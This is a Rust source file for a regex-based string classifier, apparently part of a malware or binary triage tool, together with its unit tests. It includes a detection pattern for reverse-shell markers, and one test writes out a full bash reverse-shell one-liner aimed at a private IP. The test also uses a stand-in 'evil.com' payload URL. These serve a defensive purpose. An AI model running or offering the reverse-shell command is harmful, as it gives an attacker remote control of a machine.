1use crate::classify::StringClassifier;
4use crate::StringCategory;
5use regex::Regex;
6use std::sync::OnceLock;
7
8struct PatternEntry {
9 regex: Regex,
10 category: StringCategory,
11 confidence: f32,
12}
13
14const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
21 (
22 "(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
23 StringCategory::Url,
24 0.90,
25 ),
26 (
27 r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)$",
28 StringCategory::IpV4,
29 0.95,
30 ),
31 (
34 concat!(
35 r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
36 r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
37 r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
38 r"|^::$",
39 r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
40 r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
41 r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
42 r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
43 r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
44 r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
45 ),
46 StringCategory::IpV6,
47 0.95,
48 ),
49 (
50 r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
51 StringCategory::Email,
52 0.90,
53 ),
54 (
55 r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
56 StringCategory::UnixPath,
57 0.85,
58 ),
59 (
60 r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
61 StringCategory::WindowsPath,
62 0.85,
63 ),
64 (
65 r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR)\\",
66 StringCategory::RegistryKey,
67 0.95,
68 ),
69 (
70 r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
71 StringCategory::CryptoAddress,
72 0.70,
73 ),
74 (r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
75 (
76 r"^bc1[a-zA-HJ-NP-Z0-9]{25,39}$",
77 StringCategory::CryptoAddress,
78 0.85,
79 ),
80 (
81 r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----",
82 StringCategory::PrivateKey,
83 0.99,
84 ),
85 (
86 r"^[A-Za-z0-9+/]{20,}={0,2}$",
87 StringCategory::Base64Blob,
88 0.40,
89 ),
90 (
91 r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
92 StringCategory::ShellCommand,
93 0.90,
94 ),
95];
96
97fn patterns() -> &'static [PatternEntry] {
98 static PATTERNS: OnceLock<Vec<PatternEntry>> = OnceLock::new();
99 PATTERNS.get_or_init(|| {
100 PATTERN_SPECS
101 .iter()
102 .filter_map(|(pat, category, confidence)| {
103 Regex::new(pat).ok().map(|regex| PatternEntry {
104 regex,
105 category: category.clone(),
106 confidence: *confidence,
107 })
108 })
109 .collect()
110 })
111}
112
113pub struct RegexClassifier;
115
116impl StringClassifier for RegexClassifier {
117 fn name(&self) -> &str {
118 "regex"
119 }
120
121 fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
122 let mut results = Vec::new();
123 for entry in patterns() {
124 if entry.regex.is_match(input) {
125 results.push((entry.category.clone(), entry.confidence));
126 }
127 }
128 results
129 }
130}
131
132inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);
133
134#[cfg(test)]
135mod tests {
136 use super::*;
137
138 fn classify(input: &str) -> Vec<(StringCategory, f32)> {
139 RegexClassifier.classify(input)
140 }
141
142 #[test]
143 fn classifies_url() {
144 let r = classify("https://evil.com/payload.exe");
145 assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
146 }
147
148 #[test]
149 fn classifies_ipv4() {
150 let r = classify("192.168.1.1");
151 assert!(r.iter().any(|(c, _)| *c == StringCategory::IpV4));
152 }
153
154 #[test]
155 fn classifies_email() {
156 let r = classify("user@example.com");
157 assert!(r.iter().any(|(c, _)| *c == StringCategory::Email));
158 }
159
160 #[test]
161 fn classifies_unix_path() {
162 let r = classify("/etc/passwd");
163 assert!(r.iter().any(|(c, _)| *c == StringCategory::UnixPath));
164 }
165
166 #[test]
167 fn classifies_windows_path() {
168 let r = classify("C:\\Windows\\System32\\cmd.exe");
169 assert!(r.iter().any(|(c, _)| *c == StringCategory::WindowsPath));
170 }
171
172 #[test]
173 fn classifies_registry_key() {
174 let r = classify("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft");
175 assert!(r.iter().any(|(c, _)| *c == StringCategory::RegistryKey));
176 }
177
178 #[test]
179 fn classifies_ethereum_address() {
180 let r = classify("0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28");
181 assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
182 }
183
184 #[test]
185 fn classifies_pem_private_key() {
186 let r = classify("-----BEGIN RSA PRIVATE KEY-----");
187 assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
188 }
189
190 #[test]
191 fn classifies_shell_command() {
192 let r = classify("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");
193 assert!(r.iter().any(|(c, _)| *c == StringCategory::ShellCommand));
194 }
195
196 #[test]
197 fn no_match_for_garbage() {
198 let r = classify("xyzq");
199 assert!(r.is_empty());
200 }
201
202 #[test]
203 fn classifies_btc_legacy_address() {
204 let r = classify("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa");
206 assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
207 }
208
209 #[test]
210 fn classifies_btc_bech32_address() {
211 let r = classify("bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4");
213 assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
214 }
215
216 #[test]
217 fn classifies_base64_blob() {
218 let r = classify("SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==");
219 assert!(r.iter().any(|(c, _)| *c == StringCategory::Base64Blob));
220 }
221
222 #[test]
223 fn classifier_name() {
224 let classifier = RegexClassifier;
225 assert_eq!(classifier.name(), "regex");
226 }
227
228 #[test]
229 fn classifies_http_url() {
230 let r = classify("http://example.com/page");
231 assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
232 }
233
234 #[test]
235 fn classifies_private_key_variants() {
236 let r = classify("-----BEGIN PRIVATE KEY-----");
237 assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
238
239 let r2 = classify("-----BEGIN EC PRIVATE KEY-----");
240 assert!(r2.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
241
242 let r3 = classify("-----BEGIN OPENSSH PRIVATE KEY-----");
243 assert!(r3.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
244 }
245
246 #[test]
247 fn classifies_ipv6_full() {
248 let r = classify("2001:0db8:85a3:0000:0000:8a2e:0370:7334");
250 assert!(
251 r.iter().any(|(c, _)| *c == StringCategory::IpV6),
252 "expected IpV6 classification for a full IPv6 address"
253 );
254 }
255
256 #[test]
257 fn classifies_ipv6_compressed() {
258 let r = classify("::1");
260 assert!(
261 r.iter().any(|(c, _)| *c == StringCategory::IpV6),
262 "expected IpV6 classification for loopback ::1"
263 );
264 }
265
266 #[test]
267 fn classifies_ipv6_mixed_notation() {
268 let _r = classify("fe80::1%eth0");
270 let r2 = classify("fe80::1");
273 assert!(
274 r2.iter().any(|(c, _)| *c == StringCategory::IpV6),
275 "expected IpV6 classification for fe80::1 link-local"
276 );
277 }
278}